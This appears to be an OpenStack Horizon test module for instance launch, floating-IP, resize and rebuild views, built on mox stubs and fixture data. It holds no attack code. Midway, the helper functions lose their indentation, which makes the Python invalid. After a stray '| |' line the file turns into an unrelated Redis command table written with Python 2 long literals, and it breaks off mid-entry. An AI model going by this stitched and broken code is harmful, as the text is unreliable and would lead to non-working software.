            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 tenant_id=self.tenant.id,
                                 shared=False) \
            .AndReturn(self.networks.list()[:1])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 shared=True) \
            .AndReturn(self.networks.list()[1:])
        # TODO(absubram): Remove if clause and create separate
        # test stubs for when profile_support is being used.
        # Additionally ensure those are always run even in default setting
        if api.neutron.is_port_profiles_supported():
            policy_profiles = self.policy_profiles.list()
            api.neutron.profile_list(IsA(http.HttpRequest),
                                     'policy').AndReturn(policy_profiles)
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest)) \
            .AndReturn(self.limits['absolute'])
        # Both flavor_list calls fail; the view must tolerate the error.
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndRaise(self.exceptions.nova)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndRaise(self.exceptions.nova)
        api.nova.keypair_list(IsA(http.HttpRequest)) \
            .AndReturn(self.keypairs.list())
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn(self.security_groups.list())
        api.nova.availability_zone_list(IsA(http.HttpRequest)) \
            .AndReturn(self.availability_zones.list())
        self.mox.ReplayAll()
        url = reverse('horizon:project:instances:launch')
        res = self.client.get(url)
        self.assertTemplateUsed(res, views.WorkflowView.template_name)
    @test.create_stubs({api.glance: ('image_list_detailed',),
                        api.neutron: ('network_list',
                                      'profile_list',
                                      'port_create',),
                        api.nova: ('flavor_list',
                                   'keypair_list',
                                   'availability_zone_list',
                                   'server_create',),
                        api.network: ('security_group_list',),
                        cinder: ('volume_list',
                                 'volume_snapshot_list',),
                        quotas: ('tenant_quota_usages',)})
    def test_launch_form_keystone_exception(self):
        """A keystone error from server_create redirects back to the index.

        server_create is stubbed to raise the keystone exception; the post
        must not surface a 500 but redirect to INDEX_URL (error handling is
        expected to happen inside the workflow).
        """
        flavor = self.flavors.first()
        image = self.images.first()
        keypair = self.keypairs.first()
        server = self.servers.first()
        sec_group = self.security_groups.first()
        avail_zone = self.availability_zones.first()
        customization_script = 'userData'
        nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]
        quota_usages = self.quota_usages.first()
        cinder.volume_snapshot_list(IsA(http.HttpRequest)) \
            .AndReturn(self.volumes.list())
        api.nova.flavor_list(IgnoreArg()).AndReturn(self.flavors.list())
        api.nova.keypair_list(IgnoreArg()).AndReturn(self.keypairs.list())
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn(self.security_groups.list())
        api.nova.availability_zone_list(IsA(http.HttpRequest)) \
            .AndReturn(self.availability_zones.list())
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 tenant_id=self.tenant.id,
                                 shared=False) \
            .AndReturn(self.networks.list()[:1])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 shared=True) \
            .AndReturn(self.networks.list()[1:])
        # TODO(absubram): Remove if clause and create separate
        # test stubs for when profile_support is being used.
        # Additionally ensure those are always run even in default setting
        if api.neutron.is_port_profiles_supported():
            policy_profiles = self.policy_profiles.list()
            policy_profile_id = self.policy_profiles.first().id
            port = self.ports.first()
            api.neutron.profile_list(
                IsA(http.HttpRequest),
                'policy').AndReturn(policy_profiles)
            api.neutron.port_create(
                IsA(http.HttpRequest),
                network_id=self.networks.first().id,
                policy_profile_id=policy_profile_id).AndReturn(port)
            # With port profiles the server is created against the port,
            # not the network, so the expected nics are replaced here.
            nics = [{"port-id": port.id}]
        cinder.volume_list(IgnoreArg()).AndReturn(self.volumes.list())
        api.nova.server_create(IsA(http.HttpRequest),
                               server.name,
                               image.id,
                               flavor.id,
                               keypair.name,
                               customization_script,
                               [sec_group.name],
                               block_device_mapping=None,
                               block_device_mapping_v2=None,
                               nics=nics,
                               availability_zone=avail_zone.zoneName,
                               instance_count=IsA(int),
                               admin_pass='password') \
            .AndRaise(self.exceptions.keystone)
        quotas.tenant_quota_usages(IsA(http.HttpRequest)) \
            .AndReturn(quota_usages)
        self.mox.ReplayAll()
        form_data = {'flavor': flavor.id,
                     'source_type': 'image_id',
                     'source_id': image.id,
                     'volume_size': '1',
                     'image_id': image.id,
                     'availability_zone': avail_zone.zoneName,
                     'keypair': keypair.name,
                     'name': server.name,
                     'customization_script': customization_script,
                     'project_id': self.tenants.first().id,
                     'user_id': self.user.id,
                     'groups': sec_group.name,
                     'volume_type': '',
                     'network': self.networks.first().id,
                     'count': 1,
                     'admin_pass': 'password',
                     'confirm_admin_pass': 'password'}
        url = reverse('horizon:project:instances:launch')
        res = self.client.post(url, form_data)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.glance: ('image_list_detailed',),
                        api.neutron: ('network_list',
                                      'profile_list',),
                        api.nova: ('flavor_list',
                                   'keypair_list',
                                   'tenant_absolute_limits',
                                   'availability_zone_list',),
                        api.network: ('security_group_list',),
                        cinder: ('volume_list',
                                 'volume_snapshot_list',),
                        quotas: ('tenant_quota_usages',)})
    def test_launch_form_instance_count_error(self):
        """Posting the launch form with count=0 is rejected by validation.

        No server_create expectation is recorded — the form must fail
        before reaching nova, and the response must contain the
        "greater than or equal to 1" validation message.
        """
        flavor = self.flavors.first()
        image = self.images.first()
        keypair = self.keypairs.first()
        server = self.servers.first()
        volume = self.volumes.first()
        sec_group = self.security_groups.first()
        avail_zone = self.availability_zones.first()
        customization_script = 'user data'
        device_name = u'vda'
        volume_choice = "%s:vol" % volume.id
        quota_usages = self.quota_usages.first()
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.keypair_list(IsA(http.HttpRequest)) \
            .AndReturn(self.keypairs.list())
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn(self.security_groups.list())
        api.nova.availability_zone_list(IsA(http.HttpRequest)) \
            .AndReturn(self.availability_zones.list())
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 tenant_id=self.tenant.id,
                                 shared=False) \
            .AndReturn(self.networks.list()[:1])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 shared=True) \
            .AndReturn(self.networks.list()[1:])
        # TODO(absubram): Remove if clause and create separate
        # test stubs for when profile_support is being used.
        # Additionally ensure those are always run even in default setting
        if api.neutron.is_port_profiles_supported():
            policy_profiles = self.policy_profiles.list()
            api.neutron.profile_list(IsA(http.HttpRequest),
                                     'policy').AndReturn(policy_profiles)
        cinder.volume_list(IsA(http.HttpRequest)) \
            .AndReturn(self.volumes.list())
        cinder.volume_snapshot_list(IsA(http.HttpRequest)).AndReturn([])
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest)) \
            .AndReturn(self.limits['absolute'])
        quotas.tenant_quota_usages(IsA(http.HttpRequest)) \
            .AndReturn(quota_usages)
        self.mox.ReplayAll()
        # 'count': 0 is the invalid value under test.
        form_data = {'flavor': flavor.id,
                     'source_type': 'image_id',
                     'image_id': image.id,
                     'availability_zone': avail_zone.zoneName,
                     'keypair': keypair.name,
                     'name': server.name,
                     'customization_script': customization_script,
                     'project_id': self.tenants.first().id,
                     'user_id': self.user.id,
                     'groups': sec_group.name,
                     'volume_type': 'volume_id',
                     'volume_id': volume_choice,
                     'device_name': device_name,
                     'count': 0}
        url = reverse('horizon:project:instances:launch')
        res = self.client.post(url, form_data)
        self.assertContains(res, "greater than or equal to 1")
    @test.create_stubs({api.nova: ('flavor_list', 'server_list',
                                   'tenant_absolute_limits',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',),
                        api.network:
                            ('floating_ip_simple_associate_supported',),
                        })
    def test_launch_button_disabled_when_quota_exceeded(self):
        """Launch button is rendered disabled once the instance quota is full.

        Instance usage is forced equal to the quota maximum and the index
        page is checked for the exact disabled-anchor markup, including the
        "Quota exceeded" suffix in the link title.
        """
        limits = self.limits['absolute']
        # Simulate a tenant that has used its entire instance quota.
        limits['totalInstancesUsed'] = limits['maxTotalInstances']
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
            .MultipleTimes().AndReturn(limits)
        api.network.floating_ip_simple_associate_supported(
            IsA(http.HttpRequest)).MultipleTimes().AndReturn(True)
        self.mox.ReplayAll()
        # Build the exact HTML the table is expected to render for the
        # disabled launch action.
        launch = tables.LaunchLink()
        url = launch.get_link_url()
        classes = list(launch.get_default_classes()) + list(launch.classes)
        link_name = "%s (%s)" % (unicode(launch.verbose_name),
                                 "Quota exceeded")
        expected_string = "<a href='%s' id='instances__action_launch' " \
            "title='%s' class='%s disabled'>%s</a>" \
            % (url, link_name, " ".join(classes), link_name)
        res = self.client.get(INDEX_URL)
        self.assertContains(res, expected_string, html=True,
                            msg_prefix="The launch button is not disabled")
    @test.create_stubs({api.nova: ('flavor_list', 'server_list',
                                   'tenant_absolute_limits',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',),
                        api.network:
                            ('floating_ip_simple_associate_supported',),
                        })
    def test_index_options_after_migrate(self):
        """A VERIFY_RESIZE server exposes confirm/revert actions on the index.

        The first fixture server is mutated to VERIFY_RESIZE status; the
        rendered index page must contain the confirm and revert action ids.
        """
        server = self.servers.first()
        server.status = "VERIFY_RESIZE"
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
            .MultipleTimes().AndReturn(self.limits['absolute'])
        api.network.floating_ip_simple_associate_supported(
            IsA(http.HttpRequest)).MultipleTimes().AndReturn(True)
        self.mox.ReplayAll()
        res = self.client.get(INDEX_URL)
        self.assertContains(res, "instances__confirm")
        self.assertContains(res, "instances__revert")
    @test.create_stubs({api.nova: ('flavor_list',
                                   'keypair_list',
                                   'availability_zone_list',
                                   'tenant_absolute_limits',),
                        api.network: ('security_group_list',),
                        cinder: ('volume_snapshot_list',
                                 'volume_list',),
                        api.neutron: ('network_list',
                                      'profile_list'),
                        api.glance: ('image_list_detailed',)})
    def test_select_default_keypair_if_only_one(self):
        """When exactly one keypair exists it is pre-selected in the form.

        keypair_list is stubbed to return a single keypair; the launch
        form's keypair <option> for it must carry selected='selected'.
        """
        keypair = self.keypairs.first()
        cinder.volume_list(IsA(http.HttpRequest)) \
            .AndReturn(self.volumes.list())
        # NOTE(review): snapshot listing returns volume fixtures here as
        # well — presumably only presence matters; confirm if it breaks.
        cinder.volume_snapshot_list(IsA(http.HttpRequest)) \
            .AndReturn(self.volumes.list())
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 tenant_id=self.tenant.id,
                                 shared=False) \
            .AndReturn(self.networks.list()[:1])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 shared=True) \
            .AndReturn(self.networks.list()[1:])
        # TODO(absubram): Remove if clause and create separate
        # test stubs for when profile_support is being used.
        # Additionally ensure those are always run even in default setting
        if api.neutron.is_port_profiles_supported():
            policy_profiles = self.policy_profiles.list()
            api.neutron.profile_list(IsA(http.HttpRequest),
                                     'policy').AndReturn(policy_profiles)
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest)) \
            .AndReturn(self.limits['absolute'])
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        # Only a single keypair is available to the tenant.
        api.nova.keypair_list(IsA(http.HttpRequest)) \
            .AndReturn([keypair])
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn(self.security_groups.list())
        api.nova.availability_zone_list(IsA(http.HttpRequest)) \
            .AndReturn(self.availability_zones.list())
        self.mox.ReplayAll()
        url = reverse('horizon:project:instances:launch')
        res = self.client.get(url)
        self.assertContains(res, "<option selected='selected' value='%(key)s'>"
                                 "%(key)s</option>" % {'key': keypair.name},
                            html=True,
                            msg_prefix="The default keypair was not selected.")
    @test.create_stubs({api.network: ('floating_ip_target_get_by_instance',
                                      'tenant_floating_ip_allocate',
                                      'floating_ip_associate'),
                        api.glance: ('image_list_detailed',),
                        api.nova: ('server_list',
                                   'flavor_list')})
    def test_associate_floating_ip(self):
        """The simple-associate row action allocates and attaches a float IP.

        The table action must resolve the server's floating-IP target,
        allocate a new tenant floating IP, associate it, and redirect back
        to the index page.
        """
        server = self.servers.first()
        fip = self.q_floating_ips.first()
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.flavor_list(IgnoreArg()).AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        api.network.floating_ip_target_get_by_instance(
            IsA(http.HttpRequest),
            server.id).AndReturn(server.id)
        api.network.tenant_floating_ip_allocate(
            IsA(http.HttpRequest)).AndReturn(fip)
        api.network.floating_ip_associate(
            IsA(http.HttpRequest), fip.id, server.id)
        self.mox.ReplayAll()
        formData = {'action': 'instances__associate-simple__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.network: ('floating_ip_target_get_by_instance',
                                      'tenant_floating_ip_list',
                                      'floating_ip_disassociate',
                                      'tenant_floating_ip_release'),
                        api.glance: ('image_list_detailed',),
                        api.nova: ('server_list',
                                   'flavor_list')})
    def test_disassociate_floating_ip(self):
        """Disassociating a floating IP also releases it back to the pool.

        The fixture floating IP is marked as attached to the server via
        ``port_id``; the row action must disassociate it AND release it,
        then redirect to the index page.
        """
        server = self.servers.first()
        fip = self.q_floating_ips.first()
        # Mark the fixture IP as currently attached to this server.
        fip.port_id = server.id
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.flavor_list(IgnoreArg()).AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        api.network.floating_ip_target_get_by_instance(
            IsA(http.HttpRequest),
            server.id).AndReturn(server.id)
        api.network.tenant_floating_ip_list(
            IsA(http.HttpRequest)).AndReturn([fip])
        api.network.floating_ip_disassociate(
            IsA(http.HttpRequest), fip.id, server.id)
        api.network.tenant_floating_ip_release(
            IsA(http.HttpRequest), fip.id)
        self.mox.ReplayAll()
        formData = {'action': 'instances__disassociate__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_get',
                                   'flavor_list',
                                   'tenant_absolute_limits')})
    def test_instance_resize_get(self):
        """GET of the resize workflow renders the workflow template."""
        server = self.servers.first()
        api.nova.server_get(IsA(http.HttpRequest), server.id) \
            .AndReturn(server)
        # flavor_list is expected twice — presumably once per workflow
        # step that needs flavors; confirm against the resize workflow.
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest)) \
            .AndReturn(self.limits['absolute'])
        self.mox.ReplayAll()
        url = reverse('horizon:project:instances:resize', args=[server.id])
        res = self.client.get(url)
        self.assertTemplateUsed(res, views.WorkflowView.template_name)
    @test.create_stubs({api.nova: ('server_get',
                                   'flavor_list',)})
    def test_instance_resize_get_server_get_exception(self):
        """A server_get failure on the resize view redirects to the index."""
        server = self.servers.first()
        api.nova.server_get(IsA(http.HttpRequest), server.id) \
            .AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        url = reverse('horizon:project:instances:resize',
                      args=[server.id])
        res = self.client.get(url)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_get',
                                   'flavor_list',)})
    def test_instance_resize_get_flavor_list_exception(self):
        """A flavor_list failure on the resize view redirects to the index."""
        server = self.servers.first()
        api.nova.server_get(IsA(http.HttpRequest), server.id) \
            .AndReturn(server)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        url = reverse('horizon:project:instances:resize',
                      args=[server.id])
        res = self.client.get(url)
        self.assertRedirectsNoFollow(res, INDEX_URL)
def _instance_resize_post(self, server_id, flavor_id):
formData = {'flavor': flavor_id,
'default_role': 'member'}
url = reverse('horizon:project:instances:resize',
args=[server_id])
return self.client.post(url, formData)
instance_resize_post_stubs = {
api.nova: ('server_get', 'server_resize',
'flavor_list', 'flavor_get')}
    @test.create_stubs(instance_resize_post_stubs)
    def test_instance_resize_post(self):
        """A valid resize POST calls server_resize and redirects to index."""
        server = self.servers.first()
        flavor = self.flavors.first()
        api.nova.server_get(IsA(http.HttpRequest), server.id) \
            .AndReturn(server)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.server_resize(IsA(http.HttpRequest), server.id, flavor.id) \
            .AndReturn([])
        self.mox.ReplayAll()
        res = self._instance_resize_post(server.id, flavor.id)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs(instance_resize_post_stubs)
    def test_instance_resize_post_api_exception(self):
        """A nova error during server_resize still redirects to the index."""
        server = self.servers.first()
        flavor = self.flavors.first()
        api.nova.server_get(IsA(http.HttpRequest), server.id) \
            .AndReturn(server)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.server_resize(IsA(http.HttpRequest), server.id, flavor.id) \
            .AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        res = self._instance_resize_post(server.id, flavor.id)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.glance: ('image_list_detailed',)})
    def test_rebuild_instance_get(self):
        """GET of the rebuild view renders the rebuild template."""
        server = self.servers.first()
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        self.mox.ReplayAll()
        url = reverse('horizon:project:instances:rebuild', args=[server.id])
        res = self.client.get(url)
        self.assertTemplateUsed(res, 'project/instances/rebuild.html')
def _instance_rebuild_post(self, server_id, image_id,
password=None, confirm_password=None):
form_data = {'instance_id': server_id,
'image': image_id}
if password is not None:
form_data.update(password=password)
if confirm_password is not None:
form_data.update(confirm_password=confirm_password)
url = reverse('horizon:project:instances:rebuild',
args=[server_id])
return self.client.post(url, form_data)
instance_rebuild_post_stubs = {
api.nova: ('server_rebuild',),
api.glance: ('image_list_detailed',)}
    @test.create_stubs(instance_rebuild_post_stubs)
    def test_rebuild_instance_post_with_password(self):
        """Rebuild with matching passwords passes the password to nova."""
        server = self.servers.first()
        image = self.images.first()
        password = u'testpass'
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        api.nova.server_rebuild(IsA(http.HttpRequest),
                                server.id,
                                image.id,
                                password).AndReturn([])
        self.mox.ReplayAll()
        res = self._instance_rebuild_post(server.id, image.id,
                                          password=password,
                                          confirm_password=password)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs(instance_rebuild_post_stubs)
    def test_rebuild_instance_post_with_password_equals_none(self):
        """Rebuild with no password sends None to nova; errors redirect.

        server_rebuild is stubbed to raise, so the view's error handler is
        also exercised: the response must redirect to the index page.
        """
        server = self.servers.first()
        image = self.images.first()
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        api.nova.server_rebuild(IsA(http.HttpRequest),
                                server.id,
                                image.id,
                                None).AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        res = self._instance_rebuild_post(server.id, image.id,
                                          password=None,
                                          confirm_password=None)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs(instance_rebuild_post_stubs)
    def test_rebuild_instance_post_password_do_not_match(self):
        """Mismatched password/confirmation fails validation before nova.

        No server_rebuild expectation is recorded — the form must reject
        the mismatch and show "Passwords do not match.".
        """
        server = self.servers.first()
        image = self.images.first()
        pass1 = u'somepass'
        pass2 = u'notsomepass'
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        self.mox.ReplayAll()
        res = self._instance_rebuild_post(server.id, image.id,
                                          password=pass1,
                                          confirm_password=pass2)
        self.assertContains(res, "Passwords do not match.")
    @test.create_stubs(instance_rebuild_post_stubs)
    def test_rebuild_instance_post_with_empty_string(self):
        """Empty-string passwords are normalized to None before calling nova."""
        server = self.servers.first()
        image = self.images.first()
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        # The form posts u'' but the view is expected to pass None through.
        api.nova.server_rebuild(IsA(http.HttpRequest),
                                server.id,
                                image.id,
                                None).AndReturn([])
        self.mox.ReplayAll()
        res = self._instance_rebuild_post(server.id, image.id,
                                          password=u'',
                                          confirm_password=u'')
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs(instance_rebuild_post_stubs)
    def test_rebuild_instance_post_api_exception(self):
        """A nova failure during rebuild redirects back to the index page."""
        server = self.servers.first()
        image = self.images.first()
        password = u'testpass'
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        api.nova.server_rebuild(IsA(http.HttpRequest),
                                server.id,
                                image.id,
                                password).AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        res = self._instance_rebuild_post(server.id, image.id,
                                          password=password,
                                          confirm_password=password)
        self.assertRedirectsNoFollow(res, INDEX_URL)
| |
# flake8: noqa
COMMANDS = {'APPEND': {'arity': 3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'AUTH': {'arity': 2L,
'flags': ['readonly', 'noscript', 'loading', 'stale', 'fast'],
'key_spec': (0, 0, 0)},
'BGREWRITEAOF': {'arity': 1L,
'flags': ['readonly', 'admin'],
'key_spec': (0, 0, 0)},
'BGSAVE': {'arity': 1L,
'flags': ['readonly', 'admin'],
'key_spec': (0, 0, 0)},
'BITCOUNT': {'arity': -2L,
'flags': ['readonly'],
'key_spec': (1, 1, 1)},
'BITOP': {'arity': -4L,
'flags': ['write', 'denyoom'],
'key_spec': (2, -1, 1)},
'BITPOS': {'arity': -3L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'BLPOP': {'arity': -3L,
'flags': ['write', 'noscript'],
'key_spec': (1, -2, 1)},
'BRPOP': {'arity': -3L,
'flags': ['write', 'noscript'],
'key_spec': (1, 1, 1)},
'BRPOPLPUSH': {'arity': 4L,
'flags': ['write', 'denyoom', 'noscript'],
'key_spec': (1, 2, 1)},
'CLIENT': {'arity': -2L,
'flags': ['readonly', 'admin'],
'key_spec': (0, 0, 0)},
'COMMAND': {'arity': 0L,
'flags': ['readonly', 'loading', 'stale'],
'key_spec': (0, 0, 0)},
'CONFIG': {'arity': -2L,
'flags': ['readonly', 'admin', 'stale'],
'key_spec': (0, 0, 0)},
'DBSIZE': {'arity': 1L,
'flags': ['readonly', 'fast'],
'key_spec': (0, 0, 0)},
'DEBUG': {'arity': -2L,
'flags': ['admin', 'noscript'],
'key_spec': (0, 0, 0)},
'DECR': {'arity': 2L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'DECRBY': {'arity': 3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'DEL': {'arity': -2L, 'flags': ['write'], 'key_spec': (1, -1, 1)},
'DISCARD': {'arity': 1L,
'flags': ['readonly', 'noscript', 'fast'],
'key_spec': (0, 0, 0)},
'DUMP': {'arity': 2L,
'flags': ['readonly', 'admin'],
'key_spec': (1, 1, 1)},
'ECHO': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (0, 0, 0)},
'EVAL': {'arity': -3L,
'flags': ['noscript', 'movablekeys'],
'key_spec': (0, 0, 0)},
'EVALSHA': {'arity': -3L,
'flags': ['noscript', 'movablekeys'],
'key_spec': (0, 0, 0)},
'EXEC': {'arity': 1L,
'flags': ['noscript', 'skip_monitor'],
'key_spec': (0, 0, 0)},
'EXISTS': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'EXPIRE': {'arity': 3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'EXPIREAT': {'arity': 3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'FLUSHALL': {'arity': 1L, 'flags': ['write'], 'key_spec': (0, 0, 0)},
'FLUSHDB': {'arity': 1L, 'flags': ['write'], 'key_spec': (0, 0, 0)},
'GET': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'GETBIT': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'GETRANGE': {'arity': 4L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'GETSET': {'arity': 3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'HDEL': {'arity': -3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'HEXISTS': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'HGET': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'HGETALL': {'arity': 2L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'HINCRBY': {'arity': 4L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'HINCRBYFLOAT': {'arity': 4L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'HKEYS': {'arity': 2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (1, 1, 1)},
'HLEN': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'HMGET': {'arity': -3L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'HMSET': {'arity': -4L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'HSCAN': {'arity': -3L,
'flags': ['readonly', 'random'],
'key_spec': (1, 1, 1)},
'HSET': {'arity': 4L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'HSETNX': {'arity': 4L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'HVALS': {'arity': 2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (1, 1, 1)},
'INCR': {'arity': 2L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'INCRBY': {'arity': 3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'INCRBYFLOAT': {'arity': 3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'INFO': {'arity': -1L,
